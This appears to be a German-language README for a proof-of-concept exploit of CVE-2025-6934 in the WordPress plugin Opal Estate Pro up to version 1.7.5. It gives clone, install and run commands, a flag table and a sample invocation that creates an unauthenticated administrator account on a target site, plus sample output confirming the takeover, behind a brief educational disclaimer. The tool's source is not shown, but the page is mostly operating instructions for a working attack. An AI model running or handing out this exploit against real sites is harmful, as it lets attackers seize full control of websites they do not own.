
Automatisierter PoC-Exploit für WordPress Opal Estate Pro, der verwundbare Versionen erkennt, die Nonce abruft und nicht autorisierte Administrator-Konten erstellt.
CVE-2025-6934 ist ein Proof-of-Concept-Exploit (PoC-Exploit), der gegen das WordPress-Plugin: Opal Estate Pro ≤ 1.7.5 gerichtet ist.
Dieser Exploit demonstriert die Erstellung eines Administrator-Kontos ohne Authentifizierung.
Haftungsausschluss: Dieser PoC dient nur zu Bildungszwecken. Verwenden Sie ihn nicht auf Systemen ohne Erlaubnis.
git clone https://github.com/Rosemary1337/CVE-2025-6934.git
cd CVE-2025-6934
pip install -r requirements.txt
Anforderungen:
requests,beautifulsoup4,colorama
python3 main.py -u <TARGET_URL> -mail <EMAIL> -password <PASSWORD> -user <USERNAME>
python3 main.py -u http://site.com/ -mail [email protected] -password 3xplo1tI5Fun -user r1337
| Flag | Beschreibung | Erforderlich | Standard |
|---|---|---|---|
-u, --url | URL der Zielseite | Ja | - |
-mail, --newmail | E-Mail für neuen Admin | Ja | - |
-password, --newpassword | Passwort für neuen Admin | Ja | - |
-user, --username | Benutzername für neuen Admin | Nein | administrator |
Die Konsole zeigt:
[•][✔][✖][i]Beispiel:
[•] Starting Exploit...
[✔] Nonce Found: xyz123
[✔] Exploit Successful!
Username : r1337
Email : [email protected]
Password : 3xplo1tI5Fun
Role : administrator
Ich bin ein aktiver Entwickler, der gerne Tools entwickelt und Wissen teilt. Du kannst mich erreichen über: